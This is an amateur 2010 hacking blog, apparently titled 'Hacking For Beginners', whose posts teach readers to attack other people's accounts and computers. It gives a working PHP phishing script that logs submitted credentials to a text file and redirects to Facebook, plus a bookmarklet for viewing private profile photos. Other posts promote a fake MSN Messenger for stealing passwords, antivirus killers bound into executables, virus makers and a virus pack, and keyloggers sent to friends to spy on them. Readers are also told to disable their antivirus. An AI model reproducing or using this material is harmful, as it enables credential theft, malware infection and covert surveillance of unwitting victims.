Saturday, December 4, 2010

7
See Hidden Pictures

Follow these steps :-

1. Go to the Profile-page of the Person.
2. Clear your Address line
3. Copy this into:



Code:
javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns')
;tab_controller.changePage("photos");})()



4. Now you can easily see Pictures of s.b. you don't even know.
Sunday, November 21, 2010

22
Phishing Tutorial

A video which is made by me on phishing and the important thing is you will not get banned
if you will do phishing in this manner.


Click here to see video in Good quality





Cant see anything clearly than click here





This is the script which i used in the video 


<?php
header("Location: http://www.facebook.com/");
$handle = fopen("raosrulez.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save it as      password.php
Wednesday, November 17, 2010

3
The Hackers Song

Put another password in,
Bomb it out and try again.
Try to get past logging in,
We're hacking, hacking, hacking.

Tuesday, November 16, 2010

3
Necro Virus maker

This is Necro Virus Maker ,fool ur friends and have fun...

Download Necro Virus maker from here





Note:
The program is safe from all kinds of viruses and trojans but antivirus will detect it as a virus because it is a bad program so disable your antivirus and if you still believe that its a virus then please,DONT DOWNLOAD.
Wednesday, November 3, 2010

0
How To Hack Bux.to

bux.to is an online PTC (paid to click) site, it is a new innovative, international and FREE English based service that allows advertisers to reach thousands of potential customers by displaying their ad on thier, "Surf Ads" page.
You can earn money on Bux. to by doing basically nothing
Just register yourself,then login click on surf adds and follow an ad upto 30 seconds,The green tick sign means you've earned $0.01


0
Fake MSN massenger

Fake MSN Messenger Version 5.0 (5.0.0540) by The_Law

If you want to take anyones sign-in name and password, this is it, just use this fake Messenger to let him think that he is using the real one.

How does it Work:
just run the "fakemsn.exe" file and the fake messenger screen will appear (it will looks like the real one) click on the Click here to sign-in and let the victim type his sign-in name and password then click OK, an error message will appear, and thats it.


Monday, November 1, 2010

2
What is a binder



A binder is a software that is used to combine two or more files into a single file so that when the user opens the single file,two files are executed.90% binders are used for hacking.


How to use binder for Hacking:


Thursday, October 28, 2010

1
AntiVirus Killer

Now after posting about keyloggers, i recieved many email about crypters some saying, that their crypted file doesnot run,some saying it's detected by antivirus and some saying fud crypters are expensive and after some time they get detected
So for that, here i am posting "antivirus killer" commonly known as av killer its quite simple to use them you just have to bind them with .exe file file so that when victim open the .exe ,av killer will execute and delete the antivirus installed


Here are some av killer click here to download them ,and click on skip add to download.

If you are having problems in downloading, click here to download them
Wednesday, October 27, 2010

0
400 Viruses

Now its like a gift for you all. Download 400 viruses in one file,dont be afraid for safety viruses would be in rar.


Download from here , having problems then download from here


especial thanx to sql injection
Monday, October 25, 2010

2
Hacking with Rats (Remote administration tool)

Hello my is Rao Asfand Yar. In this post i am gonna tell you about RATS(remote administation tools),mostly the beginners dont know about rats.

RATS
A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function
* captures keystrokes and used to steal password.

0
SandBoxie (should have)

If you think that you got a tool that maybe is a virus, than open the file with this tool. Sandboxie isolate the program so it cant infect your computer. You can also run sites, webbrowser and windows finder. Every hacker need this!


download from here

4
How To Make An FTP Keylogger with vb

Make a Keylogger with VB
When you are done with this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable,
without the victim getting suspicious. You will be able to keylog just about anyone.

This Guide will be split into 2 parts:
Writing your own undetectable keylogger

1
TERA BIT VIRUS MAKER (MAKES DANGEROUS VIRUSES)

Now, this is for fun, today raoasfandyar is posting a dangerous virus maker named "TERABIT VIRUS MAKER" this is a great tool for all of you people, now create a virus and send it to your enemy. Making a virus with TERABIT is so easy even kids can make it.


Sunday, October 24, 2010

1
HACK (FACEBOOK, MSN,GMAIL,YAHOO) BY KEYLOGGING

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard.A keylogger program does not require physical access to the user's computer. It can be downloaded on purpose by someone who wants to monitor activity on a particular computer or it can be downloaded unwittingly as spyware and executed as part of a rootkit or remote administration (RAT) Trojan horse. A keylogger program typically consists of two files that get installed in the same directory: a dynamic link library (DLL) file (which does all the recording) and an executable file (.EXE) that installs the DLL file and triggers it to work. The keylogger program records each keystroke the user types and uploads the information over the Internet periodically to whoever installed the program.

hello friends my name is rao and this tutorial is totally by me,"Keyloging" is one of the easy way,No,no.....one of easiest way to hack. you can get full access to victims computer,every single key which typed by victim is monitored by you.Of course,everybody wanna hack his friends for that,keylogging is the best way. whenever your friend ask for a software and you wanna spy him then bind the keylogger with any software and sent it to your friend. monitor his chat,get his password,get the screenshots of his computer but for all of this you should have a keylogger which has remote installation feature in it.

2
Hack Facebook

Hello friends in my first post i would be telling you to how to hack facebook
with the most easiest method known as phishing, While there are many other methods to hack facebook some of them are described below:


 
Hacking For Beginners | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog | Tested by Blogger Templates | Best Credit Cards